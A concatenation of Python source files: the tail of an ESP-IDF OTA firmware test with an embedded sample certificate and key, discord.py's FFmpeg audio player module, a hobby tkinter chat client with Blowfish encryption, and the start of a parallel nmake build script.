"IIPTDThiUoofUpsD5NwwHwYDVR0jBBgwFoAU6OE7ssfYIIPTDThiUoofUpsD5Nww\n"\
"DAYDVR0TBAUwAwEB/zANBgkqhkiG9w0BAQsFAAOCAQEAXIlHS/FJWfmcinUAxyBd\n"\
"/xd5Lu8ykeru6oaUCci+Vk9lyoMMES7lQ+b/00d5x7AcTawkTil9EWpBTPTOTraA\n"\
"lzJMQhNKmSLk0iIoTtAJtSZgUSpIIozqK6lenxQQDsHbXKU6h+u9H6KZE8YcjsFl\n"\
"6vL7sw9BVotw/VxfgjQ5OSGLgoLrdVT0z5C2qOuwOgz1c7jNiJhtMdwN+cOtnJp2\n"\
"fuBgEYyE3eeuWogvkWoDcIA8r17Ixzkpq2oJsdvZcHZPIZShPKW2SHUsl98KDemu\n"\
"y0pQyExmQUbwKE4vbFb9XuWCcL9XaOHQytyszt2DeD67AipvoBwVU7/LBOvqnsmy\n"\
"hA==\n"\
"-----END CERTIFICATE-----\n"
server_key = "-----BEGIN PRIVATE KEY-----\n"\
"MIIEvAIBADANBgkqhkiG9w0BAQEFAASCBKYwggSiAgEAAoIBAQCXN8LK/eYi/tOU\n"\
"uQ5vG6cp8J2sn/OB0A2uzHREG2kQ+FXnrSFYnR8SKfScg4yklKIX0TpCw92vpD56\n"\
"iAfhec4xT0kT6Ibvjc3V098YTMm9GXJy38KTxKzAo8L35Veyc51mZTD3L/G0A1tR\n"\
"ED9Oym8/PPcC+/fzZ999+skaHuig6ZplIJkWVJgctkDD9eVGvSxJFsukUZjSBeNo\n"\
"BXyIceI8NgvLiRk56mNX1TnXGL4gawvjDvnO4yCwfIXecl4ZgeC0ZUGuQvRkobm5\n"\
"1jTBwGPKyO5sMkLiJKU2KrYcPd+GzuPoJl11Xa/zjkyVUo3E/SQ7hSPgPyv7lRJY\n"\
"Lwkp8DDFAgMBAAECggEAfBhAfQE7mUByNbxgAgI5fot9eaqR1Nf+QpJ6X2H3KPwC\n"\
"02sa0HOwieFwYfj6tB1doBoNq7i89mTc+QUlIn4pHgIowHO0OGawomeKz5BEhjCZ\n"\
"4XeLYGSoODary2+kNkf2xY8JTfFEcyvGBpJEwc4S2VyYgRRx+IgnumTSH+N5mIKZ\n"\
"SXWNdZIuHEmkwod+rPRXs6/r+PH0eVW6WfpINEbr4zVAGXJx2zXQwd2cuV1GTJWh\n"\
"cPVOXLu+XJ9im9B370cYN6GqUnR3fui13urYbnWnEf3syvoH/zuZkyrVChauoFf8\n"\
"8EGb74/HhXK7Q2s8NRakx2c7OxQifCbcy03liUMmyQKBgQDFAob5B/66N4Q2cq/N\n"\
"MWPf98kYBYoLaeEOhEJhLQlKk0pIFCTmtpmUbpoEes2kCUbH7RwczpYko8tlKyoB\n"\
"6Fn6RY4zQQ64KZJI6kQVsjkYpcP/ihnOY6rbds+3yyv+4uPX7Eh9sYZwZMggE19M\n"\
"CkFHkwAjiwqhiiSlUxe20sWmowKBgQDEfx4lxuFzA1PBPeZKGVBTxYPQf+DSLCre\n"\
"ZFg3ZmrxbCjRq1O7Lra4FXWD3dmRq7NDk79JofoW50yD8wD7I0B7opdDfXD2idO8\n"\
"0dBnWUKDr2CAXyoLEINce9kJPbx4kFBQRN9PiGF7VkDQxeQ3kfS8CvcErpTKCOdy\n"\
"5wOwBTwJdwKBgDiTFTeGeDv5nVoVbS67tDao7XKchJvqd9q3WGiXikeELJyuTDqE\n"\
"zW22pTwMF+m3UEAxcxVCrhMvhkUzNAkANHaOatuFHzj7lyqhO5QPbh4J3FMR0X9X\n"\
"V8VWRSg+jA/SECP9koOl6zlzd5Tee0tW1pA7QpryXscs6IEhb3ns5R2JAoGAIkzO\n"\
"RmnhEOKTzDex611f2D+yMsMfy5BKK2f4vjLymBH5TiBKDXKqEpgsW0huoi8Gq9Uu\n"\
"nvvXXAgkIyRYF36f0vUe0nkjLuYAQAWgC2pZYgNLJR13iVbol0xHJoXQUHtgiaJ8\n"\
"GLYFzjHQPqFMpSalQe3oELko39uOC1CoJCHFySECgYBeycUnRBikCO2n8DNhY4Eg\n"\
"9Y3oxcssRt6ea5BZwgW2eAYi7/XqKkmxoSoOykUt3MJx9+EkkrL17bxFSpkj1tvL\n"\
"qvxn7egtsKjjgGNAxwXC4MwCvhveyUQQxtQb8AqGrGqo4jEEN0L15cnP38i2x1Uo\n"\
"muhfskWf4MABV0yTUaKcGg==\n"\
"-----END PRIVATE KEY-----\n"
def get_my_ip():
s1 = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s1.connect(("8.8.8.8", 80))
my_ip = s1.getsockname()[0]
s1.close()
return my_ip
def start_https_server(ota_image_dir, server_ip, server_port):
# parser = argparse.ArgumentParser()
# parser.add_argument('-p', '--port', dest='port', type= int,
# help= "Server Port", default= 8000)
# args = parser.parse_args()
os.chdir(ota_image_dir)
server_file = os.path.join(ota_image_dir, "server_cert.pem")
cert_file_handle = open(server_file, "w+")
cert_file_handle.write(server_cert)
cert_file_handle.close()
key_file = os.path.join(ota_image_dir, "server_key.pem")
key_file_handle = open("server_key.pem", "w+")
key_file_handle.write(server_key)
key_file_handle.close()
httpd = BaseHTTPServer.HTTPServer((server_ip, server_port),
SimpleHTTPServer.SimpleHTTPRequestHandler)
httpd.socket = ssl.wrap_socket(httpd.socket,
keyfile=key_file,
certfile=server_file, server_side=True)
httpd.serve_forever()
@ttfw_idf.idf_example_test(env_tag="Example_WIFI")
def test_examples_protocol_simple_ota_example(env, extra_data):
"""
steps: |
1. join AP
2. Fetch OTA image over HTTPS
3. Reboot with the new OTA image
"""
dut1 = env.get_dut("simple_ota_example", "examples/system/ota/simple_ota_example", dut_class=ttfw_idf.ESP32DUT)
# check and log bin size
binary_file = os.path.join(dut1.app.binary_path, "simple_ota.bin")
bin_size = os.path.getsize(binary_file)
ttfw_idf.log_performance("simple_ota_bin_size", "{}KB".format(bin_size // 1024))
ttfw_idf.check_performance("simple_ota_bin_size", bin_size // 1024, dut1.TARGET)
# start test
host_ip = get_my_ip()
thread1 = Thread(target=start_https_server, args=(dut1.app.binary_path, host_ip, 8000))
thread1.daemon = True
thread1.start()
dut1.start_app()
dut1.expect("Loaded app from partition at offset 0x10000", timeout=30)
try:
ip_address = dut1.expect(re.compile(r" sta ip: ([^,]+),"), timeout=30)
print("Connected to AP with IP: {}".format(ip_address))
except DUT.ExpectTimeout:
raise ValueError('ENV_TEST_FAILURE: Cannot connect to AP')
thread1.close()
dut1.expect("Starting OTA example", timeout=30)
print("writing to device: {}".format("https://" + host_ip + ":8000/simple_ota.bin"))
dut1.write("https://" + host_ip + ":8000/simple_ota.bin")
dut1.expect("Loaded app from partition at offset 0x110000", timeout=60)
dut1.expect("Starting OTA example", timeout=30)
if __name__ == '__main__':
test_examples_protocol_simple_ota_example()
|
player.py
|
"""
The MIT License (MIT)
Copyright (c) 2015-present Rapptz
Permission is hereby granted, free of charge, to any person obtaining a
copy of this software and associated documentation files (the "Software"),
to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense,
and/or sell copies of the Software, and to permit persons to whom the
Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
DEALINGS IN THE SOFTWARE.
"""
from __future__ import annotations
import asyncio
import audioop
import io
import json
import logging
import re
import shlex
import subprocess
import sys
import threading
import time
import traceback
from typing import (IO, TYPE_CHECKING, Any, Callable, Generic, Optional, Tuple,
Type, TypeVar, Union)
from .errors import ClientException
from .oggparse import OggStream
from .opus import Encoder as OpusEncoder
from .utils import MISSING
if TYPE_CHECKING:
from .voice_client import VoiceClient
AT = TypeVar('AT', bound='AudioSource')
FT = TypeVar('FT', bound='FFmpegOpusAudio')
_log = logging.getLogger(__name__)
__all__ = (
'AudioSource',
'PCMAudio',
'FFmpegAudio',
'FFmpegPCMAudio',
'FFmpegOpusAudio',
'PCMVolumeTransformer',
)
CREATE_NO_WINDOW: int
if sys.platform != 'win32':
CREATE_NO_WINDOW = 0
else:
CREATE_NO_WINDOW = 0x08000000
class AudioSource:
"""Represents an audio stream.
The audio stream can be Opus encoded or not, however if the audio stream
is not Opus encoded then the audio format must be 16-bit 48KHz stereo PCM.
.. warning::
The audio source reads are done in a separate thread.
"""
def read(self) -> bytes:
"""Reads 20ms worth of audio.
Subclasses must implement this.
If the audio is complete, then returning an empty
:term:`py:bytes-like object` to signal this is the way to do so.
If :meth:`~AudioSource.is_opus` method returns ``True``, then it must return
20ms worth of Opus encoded audio. Otherwise, it must be 20ms
worth of 16-bit 48KHz stereo PCM, which is about 3,840 bytes
per frame (20ms worth of audio).
Returns
--------
:class:`bytes`
A bytes like object that represents the PCM or Opus data.
"""
raise NotImplementedError
def is_opus(self) -> bool:
"""Checks if the audio source is already encoded in Opus."""
return False
def cleanup(self) -> None:
"""Called when clean-up is needed to be done.
Useful for clearing buffer data or processes after
it is done playing audio.
"""
pass
def __del__(self) -> None:
self.cleanup()
class PCMAudio(AudioSource):
"""Represents raw 16-bit 48KHz stereo PCM audio source.
Attributes
-----------
stream: :term:`py:file object`
A file-like object that reads byte data representing raw PCM.
"""
def __init__(self, stream: io.BufferedIOBase) -> None:
self.stream: io.BufferedIOBase = stream
def read(self) -> bytes:
ret = self.stream.read(OpusEncoder.FRAME_SIZE)
if len(ret) != OpusEncoder.FRAME_SIZE:
return b''
return ret
class FFmpegAudio(AudioSource):
"""Represents an FFmpeg (or AVConv) based AudioSource.
User created AudioSources using FFmpeg differently from how :class:`FFmpegPCMAudio` and
:class:`FFmpegOpusAudio` work should subclass this.
.. versionadded:: 1.3
"""
def __init__(self, source: Union[str, io.BufferedIOBase], *, executable: str = 'ffmpeg', args: Any, **subprocess_kwargs: Any):
piping = subprocess_kwargs.get('stdin') == subprocess.PIPE
if piping and isinstance(source, str):
raise TypeError("parameter conflict: 'source' parameter cannot be a string when piping to stdin")
args = [executable, *args]
kwargs = {'stdout': subprocess.PIPE}
kwargs.update(subprocess_kwargs)
self._process: subprocess.Popen = self._spawn_process(args, **kwargs)
self._stdout: IO[bytes] = self._process.stdout # type: ignore
self._stdin: Optional[IO[bytes]] = None
self._pipe_thread: Optional[threading.Thread] = None
if piping:
n = f'popen-stdin-writer:{id(self):#x}'
self._stdin = self._process.stdin
self._pipe_thread = threading.Thread(target=self._pipe_writer, args=(source,), daemon=True, name=n)
self._pipe_thread.start()
def _spawn_process(self, args: Any, **subprocess_kwargs: Any) -> subprocess.Popen:
process = None
try:
process = subprocess.Popen(args, creationflags=CREATE_NO_WINDOW, **subprocess_kwargs)
except FileNotFoundError:
executable = args.partition(' ')[0] if isinstance(args, str) else args[0]
raise ClientException(executable + ' was not found.') from None
except subprocess.SubprocessError as exc:
raise ClientException(f'Popen failed: {exc.__class__.__name__}: {exc}') from exc
else:
return process
def _kill_process(self) -> None:
proc = self._process
if proc is MISSING:
return
_log.info('Preparing to terminate ffmpeg process %s.', proc.pid)
try:
proc.kill()
except Exception:
_log.exception('Ignoring error attempting to kill ffmpeg process %s', proc.pid)
if proc.poll() is None:
_log.info('ffmpeg process %s has not terminated. Waiting to terminate...', proc.pid)
proc.communicate()
_log.info('ffmpeg process %s should have terminated with a return code of %s.', proc.pid, proc.returncode)
else:
_log.info('ffmpeg process %s successfully terminated with return code of %s.', proc.pid, proc.returncode)
def _pipe_writer(self, source: io.BufferedIOBase) -> None:
while self._process:
# arbitrarily large read size
data = source.read(8192)
if not data:
self._process.terminate()
return
try:
self._stdin.write(data)
except Exception:
_log.debug('Write error for %s, this is probably not a problem', self, exc_info=True)
# at this point the source data is either exhausted or the process is fubar
self._process.terminate()
return
def cleanup(self) -> None:
self._kill_process()
self._process = self._stdout = self._stdin = MISSING
class FFmpegPCMAudio(FFmpegAudio):
"""An audio source from FFmpeg (or AVConv).
This launches a sub-process to a specific input file given.
.. warning::
You must have the ffmpeg or avconv executable in your path environment
variable in order for this to work.
Parameters
------------
source: Union[:class:`str`, :class:`io.BufferedIOBase`]
The input that ffmpeg will take and convert to PCM bytes.
If ``pipe`` is ``True`` then this is a file-like object that is
passed to the stdin of ffmpeg.
executable: :class:`str`
The executable name (and path) to use. Defaults to ``ffmpeg``.
pipe: :class:`bool`
If ``True``, denotes that ``source`` parameter will be passed
to the stdin of ffmpeg. Defaults to ``False``.
stderr: Optional[:term:`py:file object`]
A file-like object to pass to the Popen constructor.
Could also be an instance of ``subprocess.PIPE``.
before_options: Optional[:class:`str`]
Extra command line arguments to pass to ffmpeg before the ``-i`` flag.
options: Optional[:class:`str`]
Extra command line arguments to pass to ffmpeg after the ``-i`` flag.
Raises
--------
ClientException
The subprocess failed to be created.
"""
def __init__(
self,
source: Union[str, io.BufferedIOBase],
*,
executable: str = 'ffmpeg',
pipe: bool = False,
stderr: Optional[IO[str]] = None,
before_options: Optional[str] = None,
options: Optional[str] = None
) -> None:
args = []
subprocess_kwargs = {'stdin': subprocess.PIPE if pipe else subprocess.DEVNULL, 'stderr': stderr}
if isinstance(before_options, str):
args.extend(shlex.split(before_options))
args.append('-i')
args.append('-' if pipe else source)
args.extend(('-f', 's16le', '-ar', '48000', '-ac', '2', '-loglevel', 'warning'))
if isinstance(options, str):
args.extend(shlex.split(options))
args.append('pipe:1')
super().__init__(source, executable=executable, args=args, **subprocess_kwargs)
def read(self) -> bytes:
ret = self._stdout.read(OpusEncoder.FRAME_SIZE)
if len(ret) != OpusEncoder.FRAME_SIZE:
return b''
return ret
def is_opus(self) -> bool:
return False
class FFmpegOpusAudio(FFmpegAudio):
"""An audio source from FFmpeg (or AVConv).
This launches a sub-process to a specific input file given. However, rather than
producing PCM packets like :class:`FFmpegPCMAudio` does that need to be encoded to
Opus, this class produces Opus packets, skipping the encoding step done by the library.
Alternatively, instead of instantiating this class directly, you can use
:meth:`FFmpegOpusAudio.from_probe` to probe for bitrate and codec information. This
can be used to opportunistically skip pointless re-encoding of existing Opus audio data
for a boost in performance at the cost of a short initial delay to gather the information.
The same can be achieved by passing ``copy`` to the ``codec`` parameter, but only if you
know that the input source is Opus encoded beforehand.
.. versionadded:: 1.3
.. warning::
You must have the ffmpeg or avconv executable in your path environment
variable in order for this to work.
Parameters
------------
source: Union[:class:`str`, :class:`io.BufferedIOBase`]
The input that ffmpeg will take and convert to Opus bytes.
If ``pipe`` is ``True`` then this is a file-like object that is
passed to the stdin of ffmpeg.
bitrate: :class:`int`
The bitrate in kbps to encode the output to. Defaults to ``128``.
codec: Optional[:class:`str`]
The codec to use to encode the audio data. Normally this would be
just ``libopus``, but is used by :meth:`FFmpegOpusAudio.from_probe` to
opportunistically skip pointlessly re-encoding Opus audio data by passing
``copy`` as the codec value. Any values other than ``copy``, ``opus``, or
``libopus`` will be considered ``libopus``. Defaults to ``libopus``.
.. warning::
Do not provide this parameter unless you are certain that the audio input is
already Opus encoded. For typical use :meth:`FFmpegOpusAudio.from_probe`
should be used to determine the proper value for this parameter.
executable: :class:`str`
The executable name (and path) to use. Defaults to ``ffmpeg``.
pipe: :class:`bool`
If ``True``, denotes that ``source`` parameter will be passed
to the stdin of ffmpeg. Defaults to ``False``.
stderr: Optional[:term:`py:file object`]
A file-like object to pass to the Popen constructor.
Could also be an instance of ``subprocess.PIPE``.
before_options: Optional[:class:`str`]
Extra command line arguments to pass to ffmpeg before the ``-i`` flag.
options: Optional[:class:`str`]
Extra command line arguments to pass to ffmpeg after the ``-i`` flag.
Raises
--------
ClientException
The subprocess failed to be created.
"""
def __init__(
self,
source: Union[str, io.BufferedIOBase],
*,
bitrate: int = 128,
codec: Optional[str] = None,
executable: str = 'ffmpeg',
pipe=False,
stderr=None,
before_options=None,
options=None,
) -> None:
args = []
subprocess_kwargs = {'stdin': subprocess.PIPE if pipe else subprocess.DEVNULL, 'stderr': stderr}
if isinstance(before_options, str):
args.extend(shlex.split(before_options))
args.append('-i')
args.append('-' if pipe else source)
codec = 'copy' if codec in ('opus', 'libopus') else 'libopus'
args.extend(('-map_metadata', '-1',
'-f', 'opus',
'-c:a', codec,
'-ar', '48000',
'-ac', '2',
'-b:a', f'{bitrate}k',
'-loglevel', 'warning'))
if isinstance(options, str):
args.extend(shlex.split(options))
args.append('pipe:1')
super().__init__(source, executable=executable, args=args, **subprocess_kwargs)
self._packet_iter = OggStream(self._stdout).iter_packets()
@classmethod
async def from_probe(
cls: Type[FT],
source: str,
*,
method: Optional[Union[str, Callable[[str, str], Tuple[Optional[str], Optional[int]]]]] = None,
**kwargs: Any,
) -> FT:
"""|coro|
A factory method that creates a :class:`FFmpegOpusAudio` after probing
the input source for audio codec and bitrate information.
Examples
----------
Use this function to create an :class:`FFmpegOpusAudio` instance instead of the constructor: ::
source = await discord.FFmpegOpusAudio.from_probe("song.webm")
voice_client.play(source)
If you are on Windows and don't have ffprobe installed, use the ``fallback`` method
to probe using ffmpeg instead: ::
source = await discord.FFmpegOpusAudio.from_probe("song.webm", method='fallback')
voice_client.play(source)
Using a custom method of determining codec and bitrate: ::
def custom_probe(source, executable):
# some analysis code here
return codec, bitrate
source = await discord.FFmpegOpusAudio.from_probe("song.webm", method=custom_probe)
voice_client.play(source)
Parameters
------------
source
Identical to the ``source`` parameter for the constructor.
method: Optional[Union[:class:`str`, Callable[:class:`str`, :class:`str`]]]
The probing method used to determine bitrate and codec information. As a string, valid
values are ``native`` to use ffprobe (or avprobe) and ``fallback`` to use ffmpeg
(or avconv). As a callable, it must take two string arguments, ``source`` and
``executable``. Both parameters are the same values passed to this factory function.
``executable`` will default to ``ffmpeg`` if not provided as a keyword argument.
kwargs
The remaining parameters to be passed to the :class:`FFmpegOpusAudio` constructor,
excluding ``bitrate`` and ``codec``.
Raises
--------
AttributeError
Invalid probe method, must be ``'native'`` or ``'fallback'``.
TypeError
Invalid value for ``probe`` parameter, must be :class:`str` or a callable.
Returns
--------
:class:`FFmpegOpusAudio`
An instance of this class.
"""
executable = kwargs.get('executable')
codec, bitrate = await cls.probe(source, method=method, executable=executable)
return cls(source, bitrate=bitrate, codec=codec, **kwargs) # type: ignore
@classmethod
async def probe(
cls,
source: str,
*,
method: Optional[Union[str, Callable[[str, str], Tuple[Optional[str], Optional[int]]]]] = None,
executable: Optional[str] = None,
) -> Tuple[Optional[str], Optional[int]]:
"""|coro|
Probes the input source for bitrate and codec information.
Parameters
------------
source
Identical to the ``source`` parameter for :class:`FFmpegOpusAudio`.
method
Identical to the ``method`` parameter for :meth:`FFmpegOpusAudio.from_probe`.
executable: :class:`str`
Identical to the ``executable`` parameter for :class:`FFmpegOpusAudio`.
Raises
--------
AttributeError
Invalid probe method, must be ``'native'`` or ``'fallback'``.
TypeError
Invalid value for ``probe`` parameter, must be :class:`str` or a callable.
Returns
---------
Optional[Tuple[Optional[:class:`str`], Optional[:class:`int`]]]
A 2-tuple with the codec and bitrate of the input source.
"""
method = method or 'native'
executable = executable or 'ffmpeg'
probefunc = fallback = None
if isinstance(method, str):
probefunc = getattr(cls, '_probe_codec_' + method, None)
if probefunc is None:
raise AttributeError(f"ERROR: Invalid probe method {method!r}")
if probefunc is cls._probe_codec_native:
fallback = cls._probe_codec_fallback
elif callable(method):
probefunc = method
fallback = cls._probe_codec_fallback
else:
raise TypeError("Expected str or callable for parameter 'probe', " \
f"not '{method.__class__.__name__}'")
codec = bitrate = None
loop = asyncio.get_event_loop()
try:
codec, bitrate = await loop.run_in_executor(None, lambda: probefunc(source, executable)) # type: ignore
except Exception:
if not fallback:
_log.exception("Probe '%s' using '%s' failed", method, executable)
return # type: ignore
_log.exception("Probe '%s' using '%s' failed, trying fallback", method, executable)
try:
codec, bitrate = await loop.run_in_executor(None, lambda: fallback(source, executable)) # type: ignore
except Exception:
_log.exception("Fallback probe using '%s' failed", executable)
else:
_log.info("Fallback probe found codec=%s, bitrate=%s", codec, bitrate)
else:
_log.info("Probe found codec=%s, bitrate=%s", codec, bitrate)
finally:
return codec, bitrate
@staticmethod
def _probe_codec_native(source, executable: str = 'ffmpeg') -> Tuple[Optional[str], Optional[int]]:
exe = executable[:2] + 'probe' if executable in ('ffmpeg', 'avconv') else executable
args = [exe, '-v', 'quiet', '-print_format', 'json', '-show_streams', '-select_streams', 'a:0', source]
output = subprocess.check_output(args, timeout=20)
codec = bitrate = None
if output:
data = json.loads(output)
streamdata = data['streams'][0]
codec = streamdata.get('codec_name')
bitrate = int(streamdata.get('bit_rate', 0))
bitrate = max(round(bitrate/1000), 512)
return codec, bitrate
@staticmethod
def _probe_codec_fallback(source, executable: str = 'ffmpeg') -> Tuple[Optional[str], Optional[int]]:
args = [executable, '-hide_banner', '-i', source]
proc = subprocess.Popen(args, creationflags=CREATE_NO_WINDOW, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
out, _ = proc.communicate(timeout=20)
output = out.decode('utf8')
codec = bitrate = None
codec_match = re.search(r"Stream #0.*?Audio: (\w+)", output)
if codec_match:
codec = codec_match.group(1)
br_match = re.search(r"(\d+) [kK]b/s", output)
if br_match:
bitrate = max(int(br_match.group(1)), 512)
return codec, bitrate
def read(self) -> bytes:
return next(self._packet_iter, b'')
def is_opus(self) -> bool:
return True
class PCMVolumeTransformer(AudioSource, Generic[AT]):
"""Transforms a previous :class:`AudioSource` to have volume controls.
This does not work on audio sources that have :meth:`AudioSource.is_opus`
set to ``True``.
Parameters
------------
original: :class:`AudioSource`
The original AudioSource to transform.
volume: :class:`float`
The initial volume to set it to.
See :attr:`volume` for more info.
Raises
-------
TypeError
Not an audio source.
ClientException
The audio source is opus encoded.
"""
def __init__(self, original: AT, volume: float = 1.0):
if not isinstance(original, AudioSource):
raise TypeError(f'ERROR: expected AudioSource not {original.__class__.__name__}.')
if original.is_opus():
raise ClientException('AudioSource must not be Opus encoded.')
self.original: AT = original
self.volume = volume
@property
def volume(self) -> float:
"""Retrieves or sets the volume as a floating point percentage (e.g. ``1.0`` for 100%)."""
return self._volume
@volume.setter
def volume(self, value: float) -> None:
self._volume = max(value, 0.0)
def cleanup(self) -> None:
self.original.cleanup()
def read(self) -> bytes:
ret = self.original.read()
return audioop.mul(ret, 2, min(self._volume, 2.0))
class AudioPlayer(threading.Thread):
DELAY: float = OpusEncoder.FRAME_LENGTH / 1000.0
def __init__(self, source: AudioSource, client: VoiceClient, *, after=None):
threading.Thread.__init__(self)
self.daemon: bool = True
self.source: AudioSource = source
self.client: VoiceClient = client
self.after: Optional[Callable[[Optional[Exception]], Any]] = after
self._end: threading.Event = threading.Event()
self._resumed: threading.Event = threading.Event()
self._resumed.set() # we are not paused
self._current_error: Optional[Exception] = None
self._connected: threading.Event = client._connected
self._lock: threading.Lock = threading.Lock()
if after is not None and not callable(after):
raise TypeError(f'ERROR: ERROR: Expected a callable for the "after" parameter.')
def _do_run(self) -> None:
self.loops = 0
self._start = time.perf_counter()
# getattr lookup speed ups
play_audio = self.client.send_audio_packet
self._speak(True)
while not self._end.is_set():
# are we paused?
if not self._resumed.is_set():
# wait until we aren't
self._resumed.wait()
continue
# are we disconnected from voice?
if not self._connected.is_set():
# wait until we are connected
self._connected.wait()
# reset our internal data
self.loops = 0
self._start = time.perf_counter()
self.loops += 1
data = self.source.read()
if not data:
self.stop()
break
play_audio(data, encode=not self.source.is_opus())
next_time = self._start + self.DELAY * self.loops
delay = max(0, self.DELAY + (next_time - time.perf_counter()))
time.sleep(delay)
def run(self) -> None:
try:
self._do_run()
except Exception as exc:
self._current_error = exc
self.stop()
finally:
self.source.cleanup()
self._call_after()
def _call_after(self) -> None:
error = self._current_error
if self.after is not None:
try:
self.after(error)
except Exception as exc:
_log.exception('Calling the after function failed.')
exc.__context__ = error
traceback.print_exception(type(exc), exc, exc.__traceback__)
elif error:
msg = f'Exception in voice thread {self.name}'
_log.exception(msg, exc_info=error)
print(msg, file=sys.stderr)
traceback.print_exception(type(error), error, error.__traceback__)
def stop(self) -> None:
self._end.set()
self._resumed.set()
self._speak(False)
def pause(self, *, update_speaking: bool = True) -> None:
self._resumed.clear()
if update_speaking:
self._speak(False)
def resume(self, *, update_speaking: bool = True) -> None:
self.loops = 0
self._start = time.perf_counter()
self._resumed.set()
if update_speaking:
self._speak(True)
def is_playing(self) -> bool:
return self._resumed.is_set() and not self._end.is_set()
def is_paused(self) -> bool:
return not self._end.is_set() and not self._resumed.is_set()
def _set_source(self, source: AudioSource) -> None:
with self._lock:
self.pause(update_speaking=False)
self.source = source
self.resume(update_speaking=False)
def _speak(self, speaking: bool) -> None:
try:
asyncio.run_coroutine_threadsafe(self.client.ws.speak(speaking), self.client.loop)
except Exception as e:
_log.info("Speaking call in player failed: %s", e)
|
fluffchat-client.py
|
import socket #lets me use TCP sockets in
import tkinter #handles GUI
import base64
import blowfish #handles encryption
from threading import Thread # allows multi threading
from datetime import datetime # lets me get current time
cipher = blowfish.Cipher(b"thisIsATest")
# server's IP address
print("some ip here is the default server port will always be 5002")
SERVER_HOST = input("input server ip input: ")
SERVER_PORT = 5002 # server's port
separator_token = "<SEP>" # seperates client name and message sent by client
# initialize TCP socket
s = socket.socket()
print(f"[*] Connecting to {SERVER_HOST}:{SERVER_PORT}...")
# connect to the server
s.connect((SERVER_HOST, SERVER_PORT))# connect to server
print("[+] Connected.")
#ask for name
name = input("Enter your name: ")
def receive(): # run this on message recevived
while True:
message = s.recv(1024)# get message from server
#decrypt message
message = b"".join(cipher.decrypt_ecb_cts(message))
message = base64.b64decode(message)
message = message.decode('utf8')
message = message.replace(separator_token, ": ")
msg_list.insert(tkinter.END, message)# print message to GUI
def send(event=None): #run this when you send message
date_now = datetime.now().strftime('%d/%m/%Y %H:%M')
sendNow = f"{date_now} {name} {separator_token} {to_send.get()}" # string to send to server
#encrypt message
sendNow = sendNow.encode('utf8')
sendNow_b64 = base64.b64encode(sendNow)
sendNow_b64 = b"".join(cipher.encrypt_ecb_cts(sendNow_b64))
# send the message
print(sendNow_b64)
s.send(sendNow_b64)# value must be byte to send
to_send.set(" ")
# start gui
top = tkinter.Tk()
fluffChatName = tkinter.Label(text="Fluffchat", foreground="#FFFFFF", background="#36393F")# set label at top of window to say fluffchat
top.title("fluffchat") #set title of window
top.geometry("800x700")#set size of window
top.configure(bg='#36393F')
messages_frame = tkinter.Frame(top)# create message frame for recived messages
to_send = tkinter.StringVar() # create variable for the message you send
to_send.set("Type message here") #placeholder text for text box
scrollbar = tkinter.Scrollbar(messages_frame)# make scrollbar easy to access in rest of code
msg_list = tkinter.Listbox(messages_frame, height=30, width=115 , yscrollcommand=scrollbar.set) #create box for recived messages
# pack things for GUI
scrollbar.pack(side=tkinter.RIGHT, fill=tkinter.Y)
msg_list.pack(side=tkinter.LEFT, fill=tkinter.BOTH)
msg_list.pack()
fluffChatName.pack()
scrollbar.config( command = msg_list.yview )# config to make scrollbar work
messages_frame.pack()
#create message field and send button
entry_field = tkinter.Entry(top, textvariable=to_send, width=70)
entry_field.bind("<Return>", send)
entry_field.pack(pady=7)
send_button = tkinter.Button(top, text="Send", command=send, width=30)# make send button
send_button.pack(pady=5)
#threding for reciving messages
receive_thread = Thread(target=receive)
receive_thread.start()
#keep gui running
tkinter.mainloop()
# close the socket
s.close()
|
NmakeSubdirs.py
|
# @file NmakeSubdirs.py
# This script support parallel build for nmake in windows environment.
# It supports Python2.x and Python3.x both.
#
# Copyright (c) 2018, Intel Corporation. All rights reserved.<BR>
#
# SPDX-License-Identifier: BSD-2-Clause-Patent
#
#
# Import Modules
#
from __future__ import print_function
import argparse
import threading
import time
import os
import subprocess
import multiprocessing
import copy
import sys
__prog__ = 'NmakeSubdirs'
__version__ = '%s Version %s' % (__prog__, '0.10 ')
__copyright__ = 'Copyright (c) 2018, Intel Corporation. All rights reserved.'
__description__ = 'Replace for NmakeSubdirs.bat in windows ,support parallel build for nmake.\n'
cpu_count = multiprocessing.cpu_count()
output_lock = threading.Lock()
def RunCommand(WorkDir=None, *Args, **kwargs):
if WorkDir is None:
WorkDir = os.curdir
if "stderr" not in kwargs:
kwargs["stderr"] = subprocess.STDOUT
if "stdout" not in kwargs:
kwargs["stdout"] = subprocess.PIPE
p = subprocess.Popen(Args, cwd=WorkDir, stderr=kwargs["stderr"], stdout=kwargs["stdout"])
stdout, stderr = p.communicate()
message = ""
if stdout is not None:
message = stdout.decode(errors='ignore') #for compatibility in python 2 and 3
if p.returncode != 0:
raise RuntimeError("Error while execute command \'{0}\' in direcotry {1}\n{2}".format(" ".join(Args), WorkDir, message))
output_lock.acquire(True)
print("execute command \"{0}\" in directory {1}".format(" ".join(Args), WorkDir))
try:
print(message)
except:
pass
output_lock.release()
return p.returncode, stdout
class TaskUnit(object):
def __init__(self, func, args, kwargs):
self.func = func
self.args = args
self.kwargs = kwargs
def __eq__(self, other):
return id(self).__eq__(id(other))
def run(self):
return self.func(*self.args, **self.kwargs)
def __str__(self):
para = list(self.args)
para.extend("{0}={1}".format(k, v)for k, v in self.kwargs.items())
return "{0}({1})".format(self.func.__name__, ",".join(para))
class ThreadControl(object):
def __init__(self, maxthread):
self._processNum = maxthread
self.pending = []
self.running = []
self.pendingLock = threading.Lock()
self.runningLock = threading.Lock()
self.error = False
self.errorLock = threading.Lock()
self.errorMsg = "errorMsg"
def addTask(self, func, *args, **kwargs):
self.pending.append(TaskUnit(func, args, kwargs))
